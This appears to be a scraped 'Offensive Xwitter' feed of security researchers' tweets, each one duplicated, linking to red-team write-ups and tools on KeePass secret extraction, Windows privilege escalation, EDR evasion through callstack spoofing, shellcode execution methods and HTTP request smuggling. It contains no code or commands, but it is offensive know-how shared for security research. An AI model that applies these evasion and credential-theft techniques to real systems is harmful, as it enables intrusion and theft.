π [ AnubisOnSec, anubis ]
The very first Red Team based article officially published by @nvidia is out now!
Honored to have my write up be the first one, but there will be many more coming out from my team this year.
https://t.co/y62teiMpi5
π https://developer.nvidia.com/blog/exploiting-and-securing-jenkins-instances-at-scale-with-groovywaiter/
π₯ [ tweet ]
The very first Red Team based article officially published by @nvidia is out now!
Honored to have my write up be the first one, but there will be many more coming out from my team this year.
https://t.co/y62teiMpi5
π https://developer.nvidia.com/blog/exploiting-and-securing-jenkins-instances-at-scale-with-groovywaiter/
π₯ [ tweet ]
π [ elad_shamir, Elad Shamir ]
Have you ever wondered how RODCs work and whether compromising one would necessarily allow for privilege escalation?
The answers are in my new post:
At the Edge of Tier Zero: The Curious Case of the RODC
https://t.co/GeNn1cxxhX
π https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
π₯ [ tweet ]
Have you ever wondered how RODCs work and whether compromising one would necessarily allow for privilege escalation?
The answers are in my new post:
At the Edge of Tier Zero: The Curious Case of the RODC
https://t.co/GeNn1cxxhX
π https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06
π₯ [ tweet ]
π [ bohops, bohops ]
PyBOF: In-memory loading and execution of Beacon Object Files (BOFs) through Python
https://t.co/Qu499zWNAn
cc: @kakt1s2015
π https://github.com/rkbennett/pybof
π₯ [ tweet ]
PyBOF: In-memory loading and execution of Beacon Object Files (BOFs) through Python
https://t.co/Qu499zWNAn
cc: @kakt1s2015
π https://github.com/rkbennett/pybof
π₯ [ tweet ]
π [ eversinc33, eversinc33 ]
I am probably just tripping, but I didnt find any C# implementation of the StartWebclient BOF from @OutflankNL on github (?) so I did a quick copy paste port to C# to make that windows privesc even more straightforward https://t.co/LJgDB8Bd7E
π https://github.com/eversinc33/SharpStartWebclient
π₯ [ tweet ]
I am probably just tripping, but I didnt find any C# implementation of the StartWebclient BOF from @OutflankNL on github (?) so I did a quick copy paste port to C# to make that windows privesc even more straightforward https://t.co/LJgDB8Bd7E
π https://github.com/eversinc33/SharpStartWebclient
π₯ [ tweet ]
Offensive Xwitter
π ΠΠ½Π΅ ΠΎΡΠ΅Π½Ρ Π½ΡΠ°Π²ΡΡΡΡ Π°ΡΠ°ΠΊΠΈ Π½Π° #KeePass, ΠΏΠΎΡΡΠΎΠΌΡ Π΄Π΅ΡΠΆΠΈΡΠ΅ ΠΏΠΎΠ΄Π±ΠΎΡΠΊΡ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠΎΠ² ΠΈ ΡΠ΅ΡΠ΅ΡΡΠ΅ΠΉ Π½Π° ΡΠ΅ΠΌΡ: - https://blog.harmj0y.net/redteaming/a-case-study-in-attacking-keepass/ - https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-partβ¦
π [ an0n_r0, an0n ]
somehow CVE-2023-24055 has been assigned on #KeePass for an attack path published by @harmj0y and @tifkin_ 7 years ago in 2016: https://t.co/kmWcoLBReo (look at the section Exfiltration Without Malware β KeePassβ Trigger System). awesome!π
π https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
π₯ [ tweet ][ quote ]
somehow CVE-2023-24055 has been assigned on #KeePass for an attack path published by @harmj0y and @tifkin_ 7 years ago in 2016: https://t.co/kmWcoLBReo (look at the section Exfiltration Without Malware β KeePassβ Trigger System). awesome!π
π https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
π₯ [ tweet ][ quote ]
π [ _nwodtuhs, Charlie Bromberg βShutdownβ ]
Big up to @Fransosiche and @Wlayzz for the new "HTTP Request Smuggling" page on The Hacker Recipes π§βπ³
https://t.co/9k8aKrAIjz
π https://www.thehacker.recipes/web/config/http-request-smuggling
π₯ [ tweet ]
Big up to @Fransosiche and @Wlayzz for the new "HTTP Request Smuggling" page on The Hacker Recipes π§βπ³
https://t.co/9k8aKrAIjz
π https://www.thehacker.recipes/web/config/http-request-smuggling
π₯ [ tweet ]
π [ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Here it goes. A detailed blog on proxying your DLL loads and hiding the original callstack from userland hooks/ETW with a new set of undocumented API and some hacky tricks. Code is on my Github repository. This one was a brain buster π₯
https://t.co/AKFW8hthXZ
π https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
π₯ [ tweet ]
Here it goes. A detailed blog on proxying your DLL loads and hiding the original callstack from userland hooks/ETW with a new set of undocumented API and some hacky tricks. Code is on my Github repository. This one was a brain buster π₯
https://t.co/AKFW8hthXZ
π https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/
π₯ [ tweet ]
πΉ [ snovvcrash, snπ₯Άvvcrπ₯sh ]
Keep in mind when scraping usernames from a #Cisco #CUCM server with @n00py1βs cucme[.]sh or @TrustedSecβs SeeYouCM-Thief: the names can be not only within the <userName> tag but also within the <firstName> and <lastName> tags. Worth checking!
https://t.co/GGX5OeKQ3Q
π https://ppn.snovvcrash.rocks/pentest/infrastructure/networks/sip-voip#cisco-ip-phones
π₯ [ tweet ]
Keep in mind when scraping usernames from a #Cisco #CUCM server with @n00py1βs cucme[.]sh or @TrustedSecβs SeeYouCM-Thief: the names can be not only within the <userName> tag but also within the <firstName> and <lastName> tags. Worth checking!
https://t.co/GGX5OeKQ3Q
π https://ppn.snovvcrash.rocks/pentest/infrastructure/networks/sip-voip#cisco-ip-phones
π₯ [ tweet ]
π [ _ZakSec, Zak ]
New Masky release (v0.2.0). Nothing crazy but you can now easily pack the agent to avoid basic EDR detections (look at the -e & -fa parameters). Some bug fixes have also been applied on the PKINIT part, thanks @mpgn_x64 !
Here is an example with the awesome NimCrypt2 loader π
π₯ [ tweet ]
New Masky release (v0.2.0). Nothing crazy but you can now easily pack the agent to avoid basic EDR detections (look at the -e & -fa parameters). Some bug fixes have also been applied on the PKINIT part, thanks @mpgn_x64 !
Here is an example with the awesome NimCrypt2 loader π
π₯ [ tweet ]
π [ _Wra7h, Christian W ]
70 shellcode execution methods to pop calc and chill to
https://t.co/YdvfxlkFRJ
π https://github.com/Wra7h/FlavorTown/tree/main/C
π₯ [ tweet ]
70 shellcode execution methods to pop calc and chill to
https://t.co/YdvfxlkFRJ
π https://github.com/Wra7h/FlavorTown/tree/main/C
π₯ [ tweet ]
π [ a13xp0p0v, Alexander Popov ]
I summarized the experience with code collaboration platforms in a short article:
"Mirroring GitHub projects in 2023"
https://t.co/kit4Dlik7t
π https://a13xp0p0v.github.io/2023/01/29/mirroring-github-projects.html
π₯ [ tweet ]
I summarized the experience with code collaboration platforms in a short article:
"Mirroring GitHub projects in 2023"
https://t.co/kit4Dlik7t
π https://a13xp0p0v.github.io/2023/01/29/mirroring-github-projects.html
π₯ [ tweet ]
π [ NinjaParanoid, Chetan Nayak (Brute Ratel C4 Author) ]
Some EDRs catch indirect syscalls with callstack analysis. Here is a totally new technique which build a clean callstack originating from ntdll to avoid detections. No ROP required and tested and works against every EDR. Enjoy! π₯
https://t.co/sALgfx6WQ0
π https://0xdarkvortex.dev/hiding-in-plainsight/
π₯ [ tweet ]
Some EDRs catch indirect syscalls with callstack analysis. Here is a totally new technique which build a clean callstack originating from ntdll to avoid detections. No ROP required and tested and works against every EDR. Enjoy! π₯
https://t.co/sALgfx6WQ0
π https://0xdarkvortex.dev/hiding-in-plainsight/
π₯ [ tweet ]
π [ d3lb3_, Julien Bedel ]
(1/5) New kid in town π
Following last week sudden regain of interest in KeePass trigger system abuse, I decided to prepone the release of KeePwn: an Impacket-based script dedicated to KeePass discovery and secret extraction for red teamers!
https://t.co/SXsy3UFY3K
π https://github.com/Orange-Cyberdefense/KeePwn
π₯ [ tweet ]
(1/5) New kid in town π
Following last week sudden regain of interest in KeePass trigger system abuse, I decided to prepone the release of KeePwn: an Impacket-based script dedicated to KeePass discovery and secret extraction for red teamers!
https://t.co/SXsy3UFY3K
π https://github.com/Orange-Cyberdefense/KeePwn
π₯ [ tweet ]
π€―2
π [ _bin_Ash, Ash ]
Impacket's psexec drops a binary (RemCom) that is over 10 years old when creating the service it uses for command execution.
May we all aspire to write tooling that is still relevant 10 years later. RemCom = goated π
Ref: https://t.co/LTNRaflIKr
RemCom: https://t.co/YrKw1nBtAt
π https://github.com/fortra/impacket/blob/master/examples/psexec.py
π https://github.com/kavika13/RemCom
π₯ [ tweet ]
Impacket's psexec drops a binary (RemCom) that is over 10 years old when creating the service it uses for command execution.
May we all aspire to write tooling that is still relevant 10 years later. RemCom = goated π
Ref: https://t.co/LTNRaflIKr
RemCom: https://t.co/YrKw1nBtAt
π https://github.com/fortra/impacket/blob/master/examples/psexec.py
π https://github.com/kavika13/RemCom
π₯ [ tweet ]
π₯2π1